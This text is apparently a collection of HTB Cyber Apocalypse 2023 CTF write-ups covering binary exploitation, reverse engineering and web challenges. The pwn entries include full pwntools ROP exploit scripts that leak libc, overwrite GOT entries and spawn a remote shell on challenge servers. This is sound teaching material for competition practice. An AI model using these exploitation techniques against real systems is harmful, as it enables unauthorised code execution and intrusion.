 char s[8]; // [rsp+0h] [rbp-30h] BYREF
 __int64 v2; // [rsp+8h] [rbp-28h]
 __int64 v3; // [rsp+10h] [rbp-20h]
 __int64 v4; // [rsp+18h] [rbp-18h]
 unsigned __int64 num; // [rsp+28h] [rbp-8h]

 *(_QWORD *)s = 0LL;
 v2 = 0LL;
 v3 = 0LL;
 v4 = 0LL;
 fwrite(
 "This is one of Pandora's mythical boxes!\n"
 "\n"
 "Will you open it or Return it to the Library for analysis?\n"
 "\n"
 "1. Open.\n"
 "2. Return.\n"
 "\n"
 ">> ",
 1uLL,
 0x7EuLL,
 _bss_start);
 num = read_num();
 if ( num != 2 )
 {
 fprintf(_bss_start, "%s\nWHAT HAVE YOU DONE?! WE ARE DOOMED!\n\n", "\x1B[1;31m");
 exit(1312);
 }
 fwrite("\nInsert location of the library: ", 1uLL, 0x21uLL, _bss_start);
 fgets(s, 256, stdin);
 return fwrite(
 "\nWe will deliver the mythical box to the Library for analysis, thank you!\n\n",
 1uLL,
 75uLL,
 _bss_start);
}

A classic buffer overflow exploitation. Howerver, this time there was no win function to print out the flag so we had to get a shell using ret2libc technique. The binary has no Canary nor PIE enable so we didn’t need to leak anything other than the libc address.

Using gdb we knew that the offset from our input buffer to the return address of box() is 56 bytes long.

Our 1st ROP chain would be to leak the address of the puts() function from the GOT table using the puts() function itself.

The 2nd ROP chain was used to call the system() function from the libc with the argument string being “/bin/sh”. I didn’t use one_gadget since none of the provided gadgets worked.

The other gadgets such as pop rdi ; ret you can get them using ROPgadget or Ropper

Here’s the exploit script.

from pwn import *

exe = ELF('./pb')
libc = ELF('./libc.so.6')
io = remote('68.183.37.122', 30673)
#io = exe.process()
#gdb.attach(io, api=True)
# Gadgets:
pad = b'i'*56
pop_rdi = 0x000000000040142b
binsh = 0x1d8698
ret = 0x00000000004013a5

# 1st chain leak libc
io.recvuntil(b'\n>> ')
io.sendline(b'2')
io.recvuntil(b'library: ')
payload = pad + p64(pop_rdi) + p64(exe.got['puts']) + p64(exe.plt['puts']) + p64(exe.sym['main'])
io.sendline(payload)
io.recvuntil(b'thank you!\n\n')
leak_puts = u64(io.recvline(keepends=False).ljust(8, b'\x00'))
libc.address = leak_puts - libc.sym['puts']

# 2nd chain get shell
io.recvuntil(b'\n>> ')
io.sendline(b'2')
io.recvuntil(b'library: ')
print(hex(libc.sym['system']))
payload = pad + p64(ret) + p64(pop_rdi) + p64(libc.address + binsh) + p64(libc.sym['system'])
io.sendline(payload)

io.interactive()

Flag is: HTB{r3turn_2_P4nd0r4?!}

Void

Given file: Get it here!
Description: The room goes dark and all you can see is a damaged terminal. Hack into it to restore the power and find your way out.
Note: This challenge had a docker but it might be closed at the time you are reading this. All needed files will be given in the write-ups.
Category: Binary Exploitation/Pwnable
Difficulty: Medium

The program is simple, buffer overflow occurs in function vuln, here is the pseudocode of vuln.

ssize_t vuln()
{
 char buf[64]; // [rsp+0h] [rbp-40h] BYREF

 return read(0, buf, 0xC8uLL);
}

I found a similar write-up for this challenge here. The main idea is to ultilize ROP gadgets to spawn a shell, there is an interesting gadget allows us to modify memory by adding a 32 bit value to that memory, let call this add_gadget.

$ ROPgadget --binary void | grep "ebx"
0x0000000000401108 : add dword ptr [rbp - 0x3d], ebx ; nop dword ptr [rax + rax] ; ret

Our attack plan

Stage 1 store string “/bin/sh” in .bss section.
Stage 2 change read@GOT to system@GOT by adding an offset between read@GOT and system@GOT.
Stage 3 call read@plt with /bin/sh.

Our used gadgets in exploit script

rdi = 0x00000000004011bb : pop rdi ; ret
rsi_r15 = 0x00000000004011b9 : pop rsi ; pop r15 ; ret
add_gadget = 0x0000000000401108 : add dword ptr [rbp - 0x3d], ebx ; nop dword ptr [rax + rax] ; ret
gadget = 0x00000000004011b2 : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret

Here is the exploit script

from pwn import *

context.arch = 'amd64'

p = remote('138.68.162.218', 30569)
# p = process('./void')

libc_elf = ELF("./libc.so.6")
elf = ELF("./void")

read_got = elf.got['read']
libc_system = libc_elf.symbols['system']
libc_read = libc_elf.symbols['read']

system_offset = libc_system - libc_read
log.info('system offset in libc from read: {}'.format(hex(system_offset)))
system_offset = system_offset & 0xffffffffffffffff
log.info('Twos complement of this offset: {}'.format(hex(system_offset)))

binsh_addr = elf.bss() + 0x10
log.info('/bin/sh string Address: {}'.format(hex(binsh_addr)))

rsi_r15 = 0x00000000004011b9
gadget = 0x004011b2
add_gadget = 0x0000000000401108
rdi = 0x00000000004011bb
ret = 0x0000000000401016

# stage 1 store string "/bin/sh" in .bss section
payload = b'A'*0x48
payload += p64(rsi_r15) + p64(binsh_addr) + p64(0)
payload += p64(elf.plt['read'])
# Stage 2 change read@GOT to system@GOT
payload += p64(gadget)
payload += p64(system_offset) + p64(elf.got['read'] + 0x3d) + p64(0)*4
payload += p64(add_gadget)
# call read("/bin/sh") = system("/bin/sh")
payload += p64(rdi) + p64(binsh_addr)
payload += p64(ret) # padding ret 
payload += p64(elf.plt['read'])

p.send(payload+b'/bin/sh\x00')

p.interactive()

Flag is: HTB{r3s0lv3_th3_d4rkn355}

Original Posts

From FazeCT

Cyber Apocalypse 2023: The Cursed Mission - Reverse Engineering

Mon, 27 Mar 2023 00:00:00 +0000

ctf

writeup

htb-2023

Table of Contents

Shattered Tablet

Given file: Get it here!
Description: Deep in an ancient tomb, you’ve discovered a stone tablet with secret information on the locations of other relics. However, while dodging a poison dart, it slipped from your hands and shattered into hundreds of pieces. Can you reassemble it and read the clues?
Category: Reverse Engineering
Difficulty: Very Easy

Reverse Engineering category greets us with a binary. I used IDA Pro to decompile the binary.

In the main function, the input is being checked through an if clause.

I used angr to get the input (you can refer to this and this, too to get the hang of angr).

Here is the Python script.

import angr

p = angr.Project('E:/Downloads/tablet')
simgr = p.factory.simulation_manager(p.factory.entry_state())

simgr.explore(find=0x401359, avoid=0x401367)
for i in range(3):
 print(simgr.found[0].posix.dumps(i))

We have to find the address of puts(“Yes! That’s right!”); and avoid the address of puts(“No… not that”);. Also, we have to increase each of the address by 0x400000 due to the fact that this binary is PIE-enabled.

Flag is: HTB{br0k3n_4p4rt,n3ver_t0_b3_r3p41r3d}

Needle in a Haystack

Given file: Get it here!
Description: You’ve obtained an ancient alien Datasphere, containing categorized and sorted recordings of every word in the forgotten intergalactic common language. Hidden within it is the password to a tomb, but the sphere has been worn with age and the search function no longer works, only playing random recordings. You don’t have time to search through every recording - can you crack it open and extract the answer?
Category: Reverse Engineering
Difficulty: Very Easy

We are given an another binary. Again, load the binary using IDA Pro.

This time, the main algorithm of the binary is to print out a random element from the given list, and guess what, the flag is also there!

Flag is: HTB{d1v1ng_1nt0_th3_d4tab4nk5}

She Shells C Shells

Given file: Get it here!
Description: You’ve arrived in the Galactic Archive, sure that a critical clue is hidden here. You wait anxiously for a terminal to boot up, hiding in the shadows from the guards hunting for you. Unfortunately, it looks like you’ll need a password to get what you need without setting off the alarms…
Category: Reverse Engineering
Difficulty: Very Easy

We get another binary, and it’s time to use IDA Pro to decompile it.

Load the binary, we notice the function func_flag. Let’s check that out!

fgets(s, 256, stdin);
for ( i = 0; i <= 0x4C; ++i )
 s[i] ^= m1[i];
if ( memcmp(s, &t, 0x4DuLL) )
 return 0xFFFFFFFFLL;
for ( j = 0; j <= 0x4C; ++j )
 s[j] ^= m2[j];
printf("Flag: %s\n", s);
return 0LL;

This is the main part of the function. Our input string s will be used to XOR with two lists, m1 and m2. We can use export data in IDA to dump out the contents of m1 and m2, as shown below (do the same for m2).

We also know that after the first XOR, s needs to be equal to t (which we can get from the memory, too). Then we can reverse XOR to find s, and the algorithm looks like this.

t[i] ^ m1[i] = s[i % 8]

Since after the check, we continue to XOR m2 with the modified s (which should be equal to t after the memcmp), we get the algorithm to print out our flag.

t[i] ^ m2[i] = flag[i]

We can use this Python script to get the flag.

m2 = [ 0x64, 0x1E, 0xF5, 0xE2, 0xC0, 0x97, 0x44, 0x1B, 0xF8, 0x5F,
 0xF9, 0xBE, 0x18, 0x5D, 0x48, 0x8E, 0x91, 0xE4, 0xF6, 0xF1,
 0x5C, 0x8D, 0x26, 0x9E, 0x2B, 0xA1, 0x02, 0xF7, 0xC6, 0xF7,
 0xE4, 0xB3, 0x98, 0xFE, 0x57, 0xED, 0x4A, 0x4B, 0xD1, 0xF6,
 0xA1, 0xEB, 0x09, 0xC6, 0x99, 0xF2, 0x58, 0xFA, 0xCB, 0x6F,
 0x6F, 0x5E, 0x1F, 0xBE, 0x2B, 0x13, 0x8E, 0xA5, 0xA9, 0x99,
 0x93, 0xAB, 0x8F, 0x70, 0x1C, 0xC0, 0xC4, 0x3E, 0xA6, 0xFE,
 0x93, 0x35, 0x90, 0xC3, 0xC9, 0x10, 0xE9]

t = [0x2C,0x4A,0x0B7,0x99,0x0A3,0x0E5,0x70,0x78,0x93,0x6E,0x97,0x0D9,0x47,0x6D,0x38,0x0BD,0x0FF,0x0BB,0x85,0x99,0x6F,0xE1,0x4A,0x0AB,0x74,0x0C3,0x7B,0x0A8,0x0B2,0x9F,0x0D7,0x0EC,0x0EB,0x0CD,0x63,0x0B2,0x39,0x23,0x0E1,0x84,0x92,0x96,0x09,0x0C6,0x99,0x0F2,0x58,0x0FA,0x0CB,0x6F,0x6F,0x5E,0x1F,0x0BE,0x2B,0x13,0x8E,0x0A5,0x0A9,0x99,0x93,0x0AB,0x8F,0x70,0x1C,0x0C0,0x0C4,0x3E,0x0A6,0x0FE,0x93,0x35,0x90,0x0C3,0x0C9,0x10,0x0E9]

for i in range(len(t)):
 print(end=chr(t[i] ^ m2[i]))

Flag is: HTB{cr4ck1ng_0p3n_sh3ll5_by_th3_s34_sh0r3}

Hunting License

Given file: Get it here!
Description: STOP! Adventurer, have you got an up to date relic hunting license? If you don’t, you’ll need to take the exam again before you’ll be allowed passage into the spacelanes!
Note: This challenge had a docker but it might be closed at the time you are reading this. All needed files will be given in the write-ups.
Category: Reverse Engineering
Difficulty: Easy

We are given a binary file, together with a netcat server.

By analyzing the binary file using file, we can answer some first questions.

For the next question, we can use ldd license to get info about libraries of the binary.

For the upcoming question, I used gdb together with its info function command to get the address of the main function.

Using IDA Pro, we can answer some more questions correctly.

There will be 3 passwords for us to find, the first one is too obvious, the second one is reversed, and the last one is generated using XOR with the key 19.

Here is the script for the last password.

data = [0x47,0x7B,0x7A,0x61,0x77,0x52,0x7D,0x77,0x55,0x7A,0x7D,0x72,0x7F,0x32,0x32,0x32]
key = 19

print("".join(chr(i ^ key) for i in data))

Flag is: HTB{l1c3ns3_4cquir3d-hunt1ng_t1m3!}

Cave System

Given file: Get it here!
Description: Deep inside a cave system, 500 feet below the surface, you find yourself stranded with supplies running low. Ahead of you sprawls a network of tunnels, branching off and looping back on themselves. You don’t have time to explore them all - you’ll need to program your cave-crawling robot to find the way out…
Category: Reverse Engineering
Difficulty: Easy

We are given a binary once again. Using IDA Pro, for this type of challenge, we should consider using angr or z3 solver. Here I choose to use angr

Here is the Python script.

import angr

p = angr.Project('E:/Downloads/cave')
simgr = p.factory.simulation_manager(p.factory.entry_state())

simgr.explore(find=0x401ABA, avoid=0x401AC8)
for i in range(3):
 print(simgr.found[0].posix.dumps(i))

We have to find the address of puts(“Freedom at last!”); and avoid the address of puts(“Lost in the darkness, you’ll wander for eternity…”);. Also, we have to increase each of the address by 0x400000 due to the fact that this binary is PIE-enabled.

Flag is: HTB{H0p3_u_d1dn’t_g3t_th15_by_h4nd,1t5_4_pr3tty_l0ng_fl4g!!!}

Alien Saboteur

Given file: Get it here!
Description: You finally manage to make it into the main computer of the vessel, it’s time to get this over with. You try to shutdown the vessel, however a couple of access codes unknown to you are needed. You try to figure them out, but the computer start speaking some weird language, it seems like gibberish…
Category: Reverse Engineering
Difficulty: Medium

We get a binary with a text file with no format. Analyze the binary using IDA Pro, from the function “vm_create”, the text file is contained in *(v3 + 18) and being executed like a normal binary.

Each instructions appear to be at every 6th index from 0. From that, I wrote an interpreter for the text file (that runs through the binary).

from malduck import xor

ls = ['vm_add', 'vm_addi','vm_sub','vm_subi','vm_mul','vm_muli', 'vm_div', 'vm_cmp','vm_jmp','vm_inv', 'vm_push', 'vm_pop','vm_mov','vm_nop','vm_exit', 'vm_print', 'vm_putc','vm_je','vm_jne','vm_jle', 'vm_jge', 'vm_xor','vm_store', 'vm_load','vm_input']

def disass(code):
 i = 0
 while i < len(code):
 try:
 op = code[i]
 opr = ls[op]

 if opr == 'vm_add':
 print("{:03d}: ADD [{}] <- [{}] + [{}]".format(i, ls1[i + 1], ls1[i + 2], ls1[i + 3]))
 i += 6
 elif opr == 'vm_addi':
 print("{:03d}: ADDI [{}] <- [{}] + {}".format(i, ls1[i + 1], ls1[i + 2], ls1[i + 3]))
 i += 6
 elif opr == 'vm_sub':
 print("{:03d}: SUB [{}] <- [{}] - [{}]".format(i, ls1[i + 1], ls1[i + 2], ls1[i + 3]))
 i += 6
 elif opr == 'vm_subi':
 print("{:03d}: SUBI [{}] <- [{}] - {}".format(i, ls1[i + 1], ls1[i + 2], ls1[i + 3]))
 i += 6
 elif opr == 'vm_mul':
 print("{:03d}: MUL [{}] <- [{}] * [{}]".format(i, ls1[i + 1], ls1[i + 2], ls1[i + 3]))
 i += 6
 elif opr == 'vm_muli':
 print("{:03d}: MULI [{}] <- [{}] * {}".format(i, ls1[i + 1], ls1[i + 2], ls1[i + 3]))
 i += 6
 elif opr == 'vm_div':
 print("{:03d}: DIV [{}] <- [{}] / [{}]".format(i, ls1[i + 1], ls1[i + 2], ls1[i + 3]))
 i += 6
 elif opr == 'vm_cmp':
 print("{:03d}: CMP flag <- [{}] == [{}]".format(i, ls1[i + 2], ls1[i + 3]))
 i += 6
 elif opr == 'vm_jmp':
 print("{:03d}: JMP pc <- pc + [{}]".format(i, chr(ls1[i + 2])))
 i += 6
 elif opr == 'vm_inv':
 print("{:03d}: INV [31] <- syscall({}, {})".format(i, ls1[i + 1], ls1[i + 2]))
 i += 6
 elif opr == 'vm_push':
 print("{:03d}: PUSH [{}]".format(i, ls1[i + 1]))
 i += 6
 elif opr == 'vm_pop':
 print("{:03d}: POP [{}]".format(i, ls1[i + 1]))
 i += 6
 elif opr == 'vm_mov':
 print("{:03d}: MOV [{}] <- {}".format(i, ls1[i + 1], ls1[i + 2]))
 i += 6
 elif opr == 'vm_nop':
 print("{:03d}: NOP".format(i))
 i += 6
 elif opr == 'vm_exit':
 print("{:03d}: EXIT".format(i))
 i += 6
 elif opr == 'vm_print':
 print("{:03d}: PRINT [{}]".format(i, ls1[i + 1]))
 i += 6
 elif opr == 'vm_putc':
 print("{:03d}: PUTC {}".format(i, ascii(chr(ls1[i + 1]))))
 i += 6
 elif opr == 'vm_je':
 print("{:03d}: JE pc <- {} if [{}] == [{}]".format(i, ls1[i + 3]*6, ls1[i + 1], ls1[i + 2]))
 i += 6
 elif opr == 'vm_jne':
 print("{:03d}: JNE pc <- {} if [{}] != [{}]".format(i, ls1[i + 3]*6, ls1[i + 1], ls1[i + 2]))
 i += 6
 elif opr == 'vm_jle':
 print("{:03d}: JLE pc <- {} if [{}] <= [{}]".format(i, ls1[i + 3]*6, ls1[i + 1], ls1[i + 2]))
 i += 6
 elif opr == 'vm_jge':
 print("{:03d}: JGE pc <- {} if [{}] >= [{}]".format(i, ls1[i + 3]*6, ls1[i + 1], ls1[i + 2]))
 i += 6
 elif opr == 'vm_xor':
 print("{:03d}: XOR [{}] <- [{}] ^ [{}]".format(i, ls1[i + 1], ls1[i + 2], ls1[i + 3]))
 i += 6
 elif opr == 'vm_store':
 print("{:03d}: STORE MEM[[{}]] <- [{}]".format(i, ls1[i + 1], ls1[i + 2]))
 i += 6
 elif opr == 'vm_load':
 print("{:03d}: LOAD [{}] <- MEM[[{}]]".format(i, ls1[i + 1], ls1[i + 2]))
 i += 6
 elif opr == 'vm_input':
 print("{:03d}: INPUT [{}]".format(i, ls1[i + 1]))
 i += 6
 else:
 print("{:03d}: UNKNOWN".format(i))

 except:
 print("{:03d}: UNKNOWN {}".format(i, op))
 break

with open('./bin','rb') as f:
 f = f.read()
 ls1 = []
 ls2 = []
 for i in f[3:]:
 ls1.append(i)

 for i in range(714, 714 + 220*6):
 ls1[i] = ls1[i] ^ 69

 disass(ls1)

Which gives the below output.

000: PUTC '['
006: PUTC 'M'
012: PUTC 'a'
018: PUTC 'i'
024: PUTC 'n'
030: PUTC ' '
036: PUTC 'V'
042: PUTC 'e'
048: PUTC 's'
054: PUTC 's'
060: PUTC 'e'
066: PUTC 'l'
072: PUTC ' '
078: PUTC 'T'
084: PUTC 'e'
090: PUTC 'r'
096: PUTC 'm'
102: PUTC 'i'
108: PUTC 'n'
114: PUTC 'a'
120: PUTC 'l'
126: PUTC ']'
132: PUTC '\n'
138: PUTC '<'
144: PUTC ' '
150: PUTC 'E'
156: PUTC 'n'
162: PUTC 't'
168: PUTC 'e'
174: PUTC 'r'
180: PUTC ' '
186: PUTC 'k'
192: PUTC 'e'
198: PUTC 'y'
204: PUTC 'c'
210: PUTC 'o'
216: PUTC 'd'
222: PUTC 'e'
228: PUTC ' '
234: PUTC '\n'
240: PUTC '>'
246: PUTC ' '
252: MOV [30] <- 160
258: MOV [28] <- 0
264: MOV [29] <- 17
270: INPUT [25]
276: STORE MEM[[30]] <- [25]
282: ADDI [30] <- [30] + 1
288: ADDI [28] <- [28] + 1
294: JLE pc <- 270 if [28] <= [29]
300: MOV [30] <- 4
306: MOV [31] <- 160
312: MOV [28] <- 0
318: MOV [29] <- 10
324: MOV [27] <- 169
330: MOV [23] <- 0
336: LOAD [25] <- MEM[[30]]
342: LOAD [24] <- MEM[[31]]
348: XOR [25] <- [25] ^ [27]
354: JE pc <- 468 if [25] == [24]
360: PUTC 'U'
366: PUTC 'n'
372: PUTC 'k'
378: PUTC 'n'
384: PUTC 'o'
390: PUTC 'w'
396: PUTC 'n'
402: PUTC ' '
408: PUTC 'k'
414: PUTC 'e'
420: PUTC 'y'
426: PUTC 'c'
432: PUTC 'o'
438: PUTC 'd'
444: PUTC 'e'
450: PUTC '!'
456: PUTC '\n'
462: EXIT
468: ADDI [30] <- [30] + 1
474: ADDI [31] <- [31] + 1
480: ADDI [28] <- [28] + 1
486: JLE pc <- 336 if [28] <= [29]
492: MOV [15] <- 0
498: PUSH [15]
504: PUSH [15]
510: PUSH [15]
516: INV [31] <- syscall(101, 3)
522: MOV [16] <- 0
528: JE pc <- 648 if [31] == [16]
534: PUTC 'T'
540: PUTC 'e'
546: PUTC 'r'
552: PUTC 'm'
558: PUTC 'i'
564: PUTC 'n'
570: PUTC 'a'
576: PUTC 'l'
582: PUTC ' '
588: PUTC 'b'
594: PUTC 'l'
600: PUTC 'o'
606: PUTC 'c'
612: PUTC 'k'
618: PUTC 'e'
624: PUTC 'd'
630: PUTC '!'
636: PUTC '\n'
642: EXIT
648: MOV [30] <- 119
654: MULI [30] <- [30] * 6
660: MOV [28] <- 0
666: MOV [29] <- 220
672: MOV [27] <- 69
678: LOAD [25] <- MEM[[30]]
684: XOR [25] <- [25] ^ [27]
690: STORE MEM[[30]] <- [25]
696: ADDI [30] <- [30] + 1
702: ADDI [28] <- [28] + 1
708: JLE pc <- 678 if [28] <= [29]
714: PUTC '<'
720: PUTC ' '
726: PUTC 'E'
732: PUTC 'n'
738: PUTC 't'
744: PUTC 'e'
750: PUTC 'r'
756: PUTC ' '
762: PUTC 's'
768: PUTC 'e'
774: PUTC 'c'
780: PUTC 'r'
786: PUTC 'e'
792: PUTC 't'
798: PUTC ' '
804: PUTC 'p'
810: PUTC 'h'
816: PUTC 'r'
822: PUTC 'a'
828: PUTC 's'
834: PUTC 'e'
840: PUTC '\n'
846: PUTC '>'
852: PUTC ' '
858: MOV [30] <- 48
864: MOV [28] <- 0
870: MOV [29] <- 36
876: INPUT [25]
882: STORE MEM[[30]] <- [25]
888: ADDI [30] <- [30] + 1
894: ADDI [28] <- [28] + 1
900: JLE pc <- 876 if [28] <= [29]
906: MOV [28] <- 0
912: MOV [29] <- 35
918: MOV [30] <- 48
924: MOV [31] <- 148
930: MOV [26] <- 0
936: MOV [27] <- 35
942: LOAD [20] <- MEM[[30]]
948: LOAD [21] <- MEM[[31]]
954: PUSH [20]
960: POP [19]
966: MOV [18] <- 48
972: ADD [18] <- [18] + [21]
978: LOAD [17] <- MEM[[18]]
984: STORE MEM[[30]] <- [17]
990: STORE MEM[[18]] <- [19]
996: ADDI [26] <- [26] + 1
1002: ADDI [30] <- [30] + 1
1008: ADDI [31] <- [31] + 1
1014: JLE pc <- 942 if [26] <= [27]
1020: MOV [30] <- 48
1026: MOV [31] <- 248
1032: MOV [26] <- 0
1038: MOV [27] <- 35
1044: LOAD [20] <- MEM[[30]]
1050: PUSH [31]
1056: POP [15]
1062: ADD [15] <- [15] + [28]
1068: LOAD [16] <- MEM[[15]]
1074: XOR [20] <- [20] ^ [16]
1080: STORE MEM[[30]] <- [20]
1086: ADDI [26] <- [26] + 1
1092: ADDI [30] <- [30] + 1
1098: JLE pc <- 1044 if [26] <= [27]
1104: ADDI [28] <- [28] + 1
1110: JLE pc <- 918 if [28] <= [29]
1116: MOV [30] <- 48
1122: MOV [31] <- 92
1128: MOV [26] <- 0
1134: MOV [27] <- 35
1140: LOAD [15] <- MEM[[30]]
1146: LOAD [16] <- MEM[[31]]
1152: JE pc <- 1206 if [15] == [16]
1158: PUTC 'W'
1164: PUTC 'r'
1170: PUTC 'o'
1176: PUTC 'n'
1182: PUTC 'g'
1188: PUTC '!'
1194: PUTC '\n'
1200: EXIT
1206: ADDI [26] <- [26] + 1
1212: ADDI [30] <- [30] + 1
1218: ADDI [31] <- [31] + 1
1224: JLE pc <- 1140 if [26] <= [27]
1230: PUTC 'A'
1236: PUTC 'c'
1242: PUTC 'c'
1248: PUTC 'e'
1254: PUTC 's'
1260: PUTC 's'
1266: PUTC ' '
1272: PUTC 'g'
1278: PUTC 'r'
1284: PUTC 'a'
1290: PUTC 'n'
1296: PUTC 't'
1302: PUTC 'e'
1308: PUTC 'd'
1314: PUTC ','
1320: PUTC ' '
1326: PUTC 's'
1332: PUTC 'h'
1338: PUTC 'u'
1344: PUTC 't'
1350: PUTC 't'
1356: PUTC 'i'
1362: PUTC 'n'
1368: PUTC 'g'
1374: PUTC ' '
1380: PUTC 'd'
1386: PUTC 'o'
1392: PUTC 'w'
1398: PUTC 'n'
1404: PUTC '!'
1410: PUTC '\n'
1416: EXIT
1422: UNKNOWN 69

For the part from 714 onwards, the text is being XOR-ed with key 0x69.

Use debuggers to read the memory at [30] then XOR with key 169, we get the first input, which is c0d3_r3d_5hutd0wn.

Then we reach the part that it prints out Enter secret phrase. For this part, the algorithm is shuffle and XOR, which can be solved by using debuggers to read the memory at [92], [148] and [248], then by the Python script below, we get the flag.

from malduck import unhex

key1 = unhex(b"13190F0A07001D0E16100C010B1F181408091C1A21042212051B1120060215170D1E2303") #[148]
key2 = unhex(b"16B047B201FBDEEB825D5B5D107C6E215FE7452A3623D4D726D5A311EDE75ECBDB9FDDE2") #[248]
flag = list(unhex(b"655D774A3340566C75375D356E6E66366C367065776A31795D31707F6C6E33323636315D")) #[92]

for i in range(36):
 for k in range(35, -1, -1):
 flag[k] = flag[k] ^ key2[i]
 for k in range(35, -1, -1):
 tmp = flag[k]
 flag[k] = flag[key1[k]]
 flag[key1[k]] = tmp

print(''.join([chr(i) for i in flag]))

Flag is: HTB{5w1rl_4r0und_7h3_4l13n_l4ngu4g3}

Somewhat Linear

Given zip: Get it here!
Category: Reverse Engineering
Difficulty: Hard

In this challenge, we are provided with input_generator.py, impulse_response.wav, and shuffled_flag.wav files. The objective is to reverse the process implemented in input_generator.py to recover the original flag message.

The input_generator.py script reads the flag from a file, applies a randomly generated filter to shuffle the frequencies, and then writes the shuffled flag and impulse response to two separate WAV files. The filtering process is achieved by multiplying the amplitudes of the flag’s frequency components with the randomly generated filter_frequency_response.

To solve the challenge, we must deconvolute the shuffled flag by applying the inverse of the filter.

First, read the impulse_response.wav and shuffled_flag.wav files.

Next, calculate the filter’s frequency response by taking the ratio of the Fast Fourier Transform (FFT) of shuffled_flag.wav to the FFT of impulse_response.wav.

Finally, apply the inverse of the filter to shuffled_flag.wav to recover the original flag.

However, the initial attempt to reverse the process yielded a low signal-to-noise ratio, making it difficult to hear the flag. To improve the result, a Wiener filter was implemented. The Wiener filter helps in deconvolution, extracting the original signal from the convoluted signal (in this case, the filter).

Here’s the Python code to recover the flag using the Wiener filter:

import numpy as np
import soundfile as sf

# Read impulse_response.wav and shuffled_flag.wav
impulse_response, rate = sf.read('impulse_response.wav')
shuffled_flag, rate = sf.read('shuffled_flag.wav')

# Compute the Wiener filter
impulse_response_fft = np.fft.rfft(impulse_response)
shuffled_flag_fft = np.fft.rfft(shuffled_flag)
wiener_filter = np.conj(impulse_response_fft) / (np.abs(impulse_response_fft)**2 + 1e-6) # Adding a small value to avoid division by zero

# Apply the Wiener filter to recover the original flag
recovered_flag_fft = wiener_filter * shuffled_flag_fft
recovered_flag = np.fft.irfft(recovered_flag_fft)

# Save the result to a WAV file
sf.write('recovered_flag_using_wiener_filter.wav', recovered_flag, rate)

After running the script, we can listen to the recovered_flag_using_wiener_filter.wav file to hear the flag.

Flag is: HTB{th1s_w@s_l0w_eff0rt}

Analogue Signal Processing v2

Given zip: Get it here!
Category: Reverse Engineering
Difficulty: Insane

In this challenge, the encoding process is implemented in input_generator.py.

def encode_flag(flag):
 vin = np.random.uniform(-1, 1, samples)
 for i in range(len(flag)):
 vout = simulate_chained_circuits([ZLCircuit(1j * ord(flag[i]), 1)], vin, duration, SAMPLE_RATE)[0]
 sf.write(f'audio/encoded{i}.wav', np.real(vout).astype('float64'), SAMPLE_RATE, subtype='DOUBLE')

 vin = vout
 print(f'encoded {i} of {len(flag)} characters')

The encode_flag function takes the flag string as input and encodes it character by character. For each character, it creates a ZLCircuit object with a complex impedance of 1j * ord(flag[i]) and an inductance of 1 Henry. This circuit represents an inductor and a component with impedance Z in series.

The simulate_chained_circuits function from circuit.py is called with the created ZLCircuit, input signal vin, duration, and sample rate as arguments. This function calculates the state space representation of the circuits and uses it to simulate the response of the circuit to the input signal vin. The real part of the simulated output signal is saved as a WAV file with the filename format encoded{i}.wav.

The output signal vout is assigned as the input signal vin for the next iteration, as the circuits are chained, and the output of one circuit is used as the input for the next circuit. The encoding process results in a series of chained circuits with input signals that depend on the previous circuit’s output. Our goal is to reverse this encoding process and extract the hidden flag characters from the provided audio files.

To decode the flag, we need to reverse the encoding process. Since the circuits are chained and the output of one circuit is used as the input for the next circuit, we can work our way backward from the last audio file to the first.

Load the last audio file, encoded14.wav, as the initial input signal.
For each audio file, starting from the last and moving towards the first:
- Create a range of possible ASCII values for the flag’s characters. Generally, the printable ASCII characters are between 32 and 126.
- For each possible ASCII value:
  - Create a ZLCircuit object with a complex impedance of 1j * possible_ascii_value and an inductance of 1 Henry.
  - Call the simulate_chained_circuits function with the created ZLCircuit, the input signal from the audio file, duration, and sample rate as arguments.
  - Compare the simulated output signal with the input signal of the previous audio file (or a zero-filled array for the first character). Calculate the mean squared error (MSE) between the two signals.
- Find the character with the lowest MSE, which is the most likely decoded character for the current audio file.
- Use the input signal of the current audio file as the input signal for the next iteration.

By iterating through the audio files in reverse order and finding the character with the lowest mean squared error between the simulated output signal and the input signal of the previous audio file, we can reconstruct the original flag. The decoded flag obtained is “HTBqp)le_dance|”.

However, this decoded flag is not entirely accurate. With some reasonable guesses, we can correct the flag. It is likely that the “q” and “|” characters should be replaced by “{” and “}”, respectively. Also, the “)” can be replaced by “o” or “0”. After these adjustments and some attempts, we get the correct flag: “HTB{p0le_dance}”.

Flag is: HTB{p0le_dance}

Original Posts

From FazeCT

Cyber Apocalypse 2023: The Cursed Mission - Web Exploitation

Mon, 27 Mar 2023 00:00:00 +0000

Table of Contents

Introduction

Welcome to our blog post about the web challenges in the HTB Cyber Apocalypse 2023 competition! For those who may not be familiar, HTB (Hack The Box) is a platform that provides a range of cybersecurity challenges for users to test and improve their skills. Cyber Apocalypse 2023 was a massive virtual event that took place in February 2023, where thousands of participants from all over the world competed in a range of challenges, including web, crypto, reverse engineering, and more.

We were able to reach 29th place and solve 60/74 challenges. Particularly for web challenges, we got 8/9 (the one we didn’t solve was Unearthly Shop).

In this blog post, we will focus specifically on the web challenges in the Cyber Apocalypse 2023 competition. We will provide a detailed analysis of each challenge, along with our thought process and the techniques we used to solve them. Whether you’re an aspiring cybersecurity professional or a seasoned veteran, we hope you find our write-ups informative and helpful!

Trapped Source

Description: Intergalactic Ministry of Spies tested Pandora’s movement and intelligence abilities. She found herself locked in a room with no apparent means of escape. Her task was to unlock the door and make her way out. Can you help her in opening the door?
Note: This challenge had a docker but it might be closed at the time you are reading this. All needed files will be given in the write-ups.
Category: Web Exploitation
Difficulty: Very Easy

We are given a website that looks like it requires us to input the right password on a locker to process.

View page source to see if anything is given, and we can see the correct pin is 8291.

Input the correct pin and we get the flag for the challenge.

Flag is: HTB{V13w_50urc3_c4n_b3_u53ful!!!}

Gunhead

Given file:: Get it here
Description: During Pandora’s training, the Gunhead AI combat robot had been tampered with and was now malfunctioning, causing it to become uncontrollable. With the situation escalating rapidly, Pandora used her hacking skills to infiltrate the managing system of Gunhead and urgently needs to take it down.
Note: This challenge had a docker but it might be closed at the time you are reading this. All needed files will be given in the write-ups.
Category: Web Exploitation
Difficulty: Very Easy

Click the URL of the generated challenge server, we are greeted with the home page of the challenge - a pseudo management system page

There are 3 buttons on the right side of the info panel, we interest in the third one, which gives us the shell UI.

Type /help as instructed, the shell command returns the list of possible commands. We saw the ping command, which is familiar one for command injection challenges.

